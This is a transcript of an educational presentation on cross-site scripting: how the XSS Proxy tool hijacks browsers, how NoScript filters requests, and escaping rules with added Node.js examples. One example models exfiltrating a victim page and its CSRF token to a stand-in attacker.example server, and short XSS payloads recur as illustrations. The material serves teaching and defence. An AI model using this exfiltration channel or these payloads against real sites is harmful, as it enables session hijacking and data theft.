Untitled Prezi


Monica Hegde

on 14 February 2013


Transcript of Untitled Prezi

Outline

• XSS Proxy: What is it? What does it need? How does it work? Hijacking, Limitations
• NoScript: What is it? Who uses it? What does it do? The good, The bad
• What to do? Input validation; 8 rules for protection against XSS, including RULE 1: JavaScript Escape for JavaScript Data Values, RULE 2: URL Escape for URL parameter Values, RULE 3: CSS Escape & Validation
• Thank you, Q&A

RULE 2: URL Escape for URL parameter Values

Use this rule when untrusted data must be placed into an HTTP GET parameter value. URL-encode it with the ESAPI encoder (Java; note that encodeForURL declares a checked EncodingException, so the call must sit in a try block or in a method that throws it):

String safe = ESAPI.encoder().encodeForURL(request.getParameter("input"));

XSS Proxy

What is XSS Proxy?

This tool allows XSS attacks to be fully controlled by a remote attacker.
It makes XSS attacks interactive, bi-directional, persistent and much more evil.
Attacks bypass many of the XSS mitigation methods like hidden form inputs, URL re-writing and POST methods
It functions as a web server that takes commands from the attacker via a browser and supplies the JavaScript to the victim's browser.

What does it need?

• A target site with an XSS vulnerability.
• A victim that will run an XSS vector and have their browser hijacked by XSS Proxy (victim browser).
• An attack server running the XSS Proxy Perl script (XSS Proxy attack server).
• An attacker that will manage XSS Proxy and the hijacked sessions (attacker browser).
• An XSS vector that initiates the XSS Proxy hijack.

How does it work?

XSS Proxy uses JavaScript remoting (dynamically created script tags that fetch JavaScript from the attack server) to handle the initial hijack, and the victim's browser keeps looping back to the attack server to maintain hijack persistence.

Hijacking

The attacker is able to force the victim's browser to load any other content from the same server, as long as it is within the same document.domain (the same origin), and to see the same HTML the victim can see. The attacker can feed the victim's browser additional JavaScript from a remote server.
Each script callback to the attack server carries its parameters in the URL of the requested JavaScript document. The attack obeys the browser's DOM access rules: it cannot extend hijack control to other sites or servers unless they too have an XSS vulnerability.
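The two mechanisms just described, as an added example in Node.js that is not XSS Proxy's own code: a script-tag remoting channel in which every callback to the attack server carries its payload in the URL of the requested JavaScript document (so large documents must be split across several callbacks and reassembled server-side), and the document.domain / same-origin rule that bounds what a hijacked page may read. The attack-server host, the xss2.js path, the URL length budget and the sample HTML are assumptions made for the example.

```javascript
// Added example, not XSS Proxy's own code. Models (1) the script-tag remoting
// channel whose callbacks carry their payload in the requested script's URL and
// (2) the same-origin rule that limits what a hijacked page can read. Runs under
// Node without a DOM; the DOM-dependent pieces are modelled as plain functions.

const ATTACK_SERVER = 'http://attacker.example:8080'; // hypothetical attack server
const MAX_URL_LEN = 200; // small on purpose so the constructed sample splits into several callbacks

// Origin as the browser computes it: scheme, host and port.
function origin(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// A hijacked page may read (and therefore forward) only same-origin documents.
function canReadFromHijackedPage(pageUrl, resourceUrl) {
  return origin(pageUrl) === origin(resourceUrl);
}

// Victim side: split the fetched HTML into as many callback URLs as the URL
// budget requires. Each URL requests a script, so the browser will also run
// whatever JavaScript the attack server answers with (the attacker's next command).
function buildCallbacks(sessionId, body) {
  const prefix = `${ATTACK_SERVER}/xss2.js?session=${encodeURIComponent(sessionId)}&seq=`;
  const chars = Array.from(body); // code points, so surrogate pairs are never split
  const urls = [];
  let i = 0;
  for (let seq = 0; i < chars.length; seq += 1) {
    const head = `${prefix}${seq}&data=`;
    let data = '';
    // Append characters while the complete URL still fits the budget.
    while (i < chars.length) {
      const enc = encodeURIComponent(chars[i]);
      if (head.length + data.length + enc.length > MAX_URL_LEN) break;
      data += enc;
      i += 1;
    }
    if (data === '') throw new Error('URL budget too small for a single character');
    urls.push(head + data);
  }
  return urls;
}

// Attack-server side: each callback arrives as a GET for xss2.js; the payload is
// recovered from the query string and reassembled in sequence order.
function reassemble(urls) {
  const parts = urls.map((u) => {
    const q = new URL(u).searchParams;
    return { session: q.get('session'), seq: Number(q.get('seq')), data: q.get('data') };
  });
  parts.sort((a, b) => a.seq - b.seq);
  return { session: parts[0].session, body: parts.map((p) => p.data).join('') };
}

// Constructed sample: a page the hijacked browser fetched from the target's origin.
const SAMPLE_HTML =
  '<html><body><h1>Account</h1>' +
  '<form action="/transfer" method="post"><input name="to"><input name="amount">' +
  '<input type="hidden" name="csrf" value="7b9c1e"></form></body></html>';

function demo() {
  const page = 'http://target.example/app/index.html';
  const same = canReadFromHijackedPage(page, 'http://target.example/account');
  const cross = canReadFromHijackedPage(page, 'https://target.example/account'); // scheme differs
  const urls = buildCallbacks('s1', SAMPLE_HTML);
  const got = reassemble(urls);
  return { same, cross, callbacks: urls.length, roundTrip: got.body === SAMPLE_HTML };
}
```

Two points the model makes concrete: the forwarded HTML travels entirely in GET query strings (which is why the target's page content ends up in the attack server's access log, and why a long page costs several round trips), and a different scheme or port is a different origin, so the hijacked page cannot read it even on the same host.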
Limitations

The hijack stops as soon as the victim navigates away from the hijacked page or closes its window or tab.
XSS Proxy can only read and forward document content that is HTML and readable by JavaScript.
Since images and Flash-based applications cannot be transferred through XSS Proxy, the attacker's browser loads them directly from the target server, which leaves the attacker's own requests in the target's logs and makes the attack traceable.

NoScript

What is it?

NoScript is a Mozilla Firefox add-on that protects a user's computer from malicious websites on the Internet.
It protects the user from XSS attacks: a preemptive approach that prevents exploitation of security vulnerabilities (known and even unknown) with no loss of functionality.
It allows JavaScript, Java and other executable content to run only from trusted domains of your choice.
It operates by implementing a 'white list' of sites that you have determined as being acceptable, safe or trusted.
Other sites are considered potentially harmful and their functioning is restricted until the user adds them to the whitelist.

Who uses it?

Any web user browsing the Internet with Mozilla Firefox can download and use this add-on.

What does it do?

The NoScript XSS filter mediates on the HTTP request instead of on the HTTP response.
Instead of altering how the response is processed by the browser, NoScript mangles the HTTP request to remove dangerous content.
For example, if a cross-site request contains a script tag, NoScript replaces the angle brackets with whitespace characters, essentially "mangling" the original request. If the server has a reflected XSS vulnerability, it will echo the mangled script tag, which will not execute in the browser.

NoScript also restricts pesky advertisements, pop-up messages and malicious code built (or hacked) into web pages.
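A deliberately simplified request-side filter of the kind described above, as an added example that is not NoScript's code. It inspects the outgoing request's query-string values and, when one looks like injected markup, replaces its angle brackets with whitespace. Two constructed "servers" stand in for the web: one reflects the parameter verbatim (a reflected XSS bug) and one HTML-escapes it (no bug). Running both through the filter shows the mitigation working and, on the second server, the false positive that comes from deciding on the request rather than the response. The host names, trigger pattern and inputs are assumptions.

```javascript
// Added example, not NoScript's code: a simplified request-side XSS filter and
// two constructed servers, used to show both the block and the false positive.

// Simplified trigger: a tag-like token or a javascript: URL in a parameter value.
// Real filters use far larger (and hence fragile) pattern sets.
const SUSPECT = /<\/?[a-z]|javascript:/i;

// Rewrite the request, not the response: mangle any suspicious parameter value.
function filterRequest(urlString) {
  const url = new URL(urlString);
  let mangled = false;
  for (const [name, value] of [...url.searchParams]) {
    if (SUSPECT.test(value)) {
      url.searchParams.set(name, value.replace(/[<>]/g, ' ')); // angle brackets -> whitespace
      mangled = true;
    }
  }
  return { url: url.toString(), mangled };
}

// Constructed vulnerable endpoint: reflects q into the page unescaped.
function reflectUnescaped(urlString) {
  const q = new URL(urlString).searchParams.get('q') ?? '';
  return `<html><body><p>You searched for: ${q}</p></body></html>`;
}

function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed safe endpoint: same page, but q is HTML-escaped on output.
function reflectEscaped(urlString) {
  const q = new URL(urlString).searchParams.get('q') ?? '';
  return `<html><body><p>You searched for: ${escapeHtml(q)}</p></body></html>`;
}

// Would the browser parse a <script> start tag out of this response?
function hasScriptTag(html) {
  return /<script\b/i.test(html);
}

// Send a request through the filter to a server and report what came back.
function browse(server, urlString) {
  const { url, mangled } = filterRequest(urlString);
  const html = server(url);
  return { mangled, scriptTag: hasScriptTag(html), html };
}

// Constructed inputs: an injection attempt, and a legitimate query that merely
// mentions script tags (a forum search, say).
const ATTACK_URL = 'http://shop.example/search?q=' + encodeURIComponent('<script>alert(1)</script>');
const LEGIT_URL = 'http://forum.example/search?q=' + encodeURIComponent('how do I use <script> tags?');
```

Against the vulnerable server the filter turns an executable response into harmless text. Against the safe server the same filter still fires, and the user gets "how do I use  script  tags?" back instead of the correctly escaped &lt;script&gt; they typed: the filter could not see that the response was never dangerous.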
It will run silently in the background until it detects the presence of JavaScript, Adobe Flash or other script-like content. At that point NoScript blocks this content and a status bar appears at the bottom of the Firefox window. The NoScript status bar displays information about which objects and scripts are currently prevented from executing on your system.

[Figure: an example of NoScript blocking a pop-up advertisement on a commercial site]

[Figure: the Twitter web site requesting that JavaScript be enabled]

Since NoScript does not differentiate between malicious and legitimate code, certain key features and functions (for instance, a toolbar) may be missing. Some web pages present content, including script-like content, from more than one website. For example, a website like www.youtube.com has three sources of scripts:

To unblock scripts in these situations, one could select the Temporarily allow [website name] option (in this instance, Temporarily allow youtube.com).
For YouTube, you need only select Temporarily allow youtube.com and Temporarily allow ytimg.com for YouTube to work.
Under no circumstances should you select the option Allow Scripts Globally (dangerous). It only takes a single injection of malicious code to compromise your online privacy and safety.
NoScript also has a feature called the Application Boundaries Enforcer (ABE) that can be configured to stop external websites from requesting internal (intranet or localhost) resources.

The good

• Free, open-source software.
• Protects against malicious scripts and provides Application Boundaries Enforcer (ABE) security.
• Easy to use, both for an expert and a newbie.
• Blocks most annoying ads by preventing plugins or scripts from being loaded by domains not in the whitelist.

The bad

• False positives: because NoScript sanitizes outgoing requests rather than incoming responses, it cannot confirm whether the offending content actually appears in the response, let alone whether it leads to the execution of JavaScript code.
• Complex policies: covering all corner cases while avoiding false positives requires very complex detection logic, which is cumbersome to maintain.
• Usability impact: NoScript's false positives normally cause more disruption to users than those of XSS Auditor (the response-side filter in WebKit-based browsers). XSS Auditor only prevents the offending script from executing; this can impact dynamically constructed elements such as advertisements and comment frames, but will usually not prevent the main content of the page from being displayed.

What to do?

Mitigation Architecture

• Input validation
• Specify output character set
• Output encoding (know where your data is going)

Black list testing
• Identify Input
• Analyse HTML Code
• Testing for Stored XSS
White list testing
• All input must be validated against a whitelist of acceptable value ranges.

8 rules for protection against XSS

RULE 1: JavaScript Escape for JavaScript Data Values

The only safe place to put untrusted data into this code is inside a quoted "data value", and it must be JavaScript-escaped first. The slide's example uses the browser's built-in escape(), which leaves characters such as + / @ * . untouched and is deprecated; ESAPI's encodeForJavaScript is the proper encoder for this context.
<script>document.write(escape("sample for cross site scripting!"));</script>

RULE 3: CSS Escape & Validation

Use this rule when untrusted data must be placed into a stylesheet or a style tag.
Even if properly CSS escaped, some CSS contexts can never safely use this data as input, so never put untrusted data in them (the slide's property names are corrected to real ones here; the point is the value context, not the property):
<style>
selector { background-image: url("javascript:alert(1)"); }  /* any url() value, whatever the property */
selector { width: expression(alert('XSS')); }               /* expression(): only in IE */
</style>

RULE 4: Never insert untrusted data except in allowed locations
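The three escaping rules above, carried through as an added example in Node.js that is not ESAPI's code: one encoder per context (JavaScript data value, URL parameter value, CSS value), each paired with a renderer and a check that the untrusted value reaches the browser intact while no delimiter or tag survives to break out of its context. The last function shows the Rule 3 caveat: inside url() a correctly CSS-escaped javascript: URL decodes back to the same javascript: URL, so escaping cannot help there and an allowlist check on the scheme is needed instead. The encoders follow the \xHH, %HH and \HH conventions the rules describe; the host names and payloads are constructed for the example.

```javascript
// Added example, not ESAPI's code: context-specific output encoders for Rules 1-3
// with round-trip checks, and the url() allowlist that Rule 3 requires.

// Rule 1: JavaScript data value. Everything but [A-Za-z0-9] becomes \xHH or \uHHHH,
// which is safe inside a quoted JS string and leaves no "</script" for the HTML parser.
function encodeForJavaScript(s) {
  let out = '';
  for (let i = 0; i < s.length; i += 1) {
    const ch = s[i];
    if (/[A-Za-z0-9]/.test(ch)) { out += ch; continue; }
    const code = s.charCodeAt(i); // UTF-16 code unit, so \uHHHH always suffices
    out += code < 256 ? `\\x${code.toString(16).padStart(2, '0')}`
                      : `\\u${code.toString(16).padStart(4, '0')}`;
  }
  return out;
}

// Rule 2: URL parameter value.
function encodeForURL(s) {
  return encodeURIComponent(s);
}

// Rule 3: CSS value. Everything but [A-Za-z0-9] becomes \HH followed by a space;
// the space terminates the escape so a following hex digit is not swallowed.
function encodeForCSS(s) {
  return Array.from(s, (ch) =>
    /[A-Za-z0-9]/.test(ch) ? ch : `\\${ch.codePointAt(0).toString(16)} `).join('');
}

// What a CSS parser makes of those escapes again (demonstration only).
function cssUnescape(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6}) ?/g, (_, h) => String.fromCodePoint(parseInt(h, 16)));
}

// Renderers: the untrusted value goes only into a quoted data value.
function renderJsDataValue(untrusted) {
  return `var q = "${encodeForJavaScript(untrusted)}";`;
}
function renderUrlParam(untrusted) {
  return `<a href="/search?q=${encodeForURL(untrusted)}">search</a>`;
}
function renderCssString(untrusted) {
  return `.u { font-family: "${encodeForCSS(untrusted)}"; }`;
}

// Checks: the browser sees the original value, but no delimiter or tag survived.
function jsRoundTrip(untrusted) {
  const src = renderJsDataValue(untrusted);
  const q = new Function(`${src} return q;`)(); // evaluates the rendered statement
  const onlyTwoQuotes = src.split('"').length === 3; // just the two string delimiters
  return { intact: q === untrusted, leaked: !onlyTwoQuotes || /<\/script/i.test(src) };
}
function urlRoundTrip(untrusted) {
  const html = renderUrlParam(untrusted);
  const href = html.match(/href="([^"]*)"/)[1];
  const q = new URL(href, 'http://app.example').searchParams.get('q'); // hypothetical host
  return { intact: q === untrusted, leaked: /[<>"']/.test(href) };
}
function cssRoundTrip(untrusted) {
  const css = renderCssString(untrusted);
  const value = css.match(/"([^"]*)"/)[1];
  return { intact: cssUnescape(value) === untrusted, leaked: /[{}"<>]/.test(value) };
}

// Rule 3's unsafe context: inside url() the escaped text decodes back to the same
// javascript: URL, so escaping changes nothing about what the browser loads.
// The only defence is to validate the value against an allowlist first.
function safeCssUrl(untrusted) {
  let parsed;
  try { parsed = new URL(untrusted); } catch { return null; } // not an absolute URL
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return null;
  return `.u { background-image: url("${encodeForCSS(parsed.href)}"); }`;
}
```

The same split applies to expression() in old IE: it evaluates whatever text it receives once the CSS escapes are undone, so the defence is to never emit untrusted data into that position at all, which is what the final rule says.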